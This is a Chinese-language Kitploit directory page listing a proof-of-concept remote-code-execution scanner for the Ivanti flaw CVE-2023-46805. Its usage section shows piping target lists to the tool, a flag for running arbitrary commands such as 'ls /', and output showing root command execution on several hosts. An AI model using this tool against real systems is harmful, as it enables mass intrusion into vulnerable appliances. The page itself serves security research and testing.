Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-46805 — CVE-2023-46805 Ivanti POC RCE - 超快速扫描器。 | Kitploit
工具/GitHubGitHub/w2xim3/cve-2023-46805
漏洞扫描器漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHubw2xim3/cve-2023-46805

CVE-2023-46805

CVE-2023-46805 Ivanti POC RCE - 超快速扫描器。

查看仓库
242年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

标题:CVE-2023-46805 的概念验证(PoC)- 仅供教育用途

许可协议: 本作品依据知识共享署名 4.0 国际许可协议(CC BY 4.0)发布。只要适当标注作者署名,您就可以自由分享、复制、分发和传播本作品,或将其改编用于其他目的。

免责声明: 本概念验证(PoC)仅供教育和网络安全研究之用。作者、所属组织以及参与创建、制作或交付本内容的任何其他方均不对因使用或无法使用本内容而产生的任何损害承担责任,包括但不限于直接、间接、偶然、特殊、连带或惩罚性损害。

教育目标: 本 PoC 旨在帮助网络安全社区理解和缓解编号为 CVE-2023-46805 的漏洞。不应在生产环境中使用,也不得用于恶意活动。

漏洞描述: Ivanti 远程代码执行(RCE)

PoC 详细信息:

Usage of ./CVE-Ivanti:
  -cmd string
        The command to replace 'id' in the payload (default "id")
  -t int
        Number of concurrent threads (default 5)

go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'
下载工具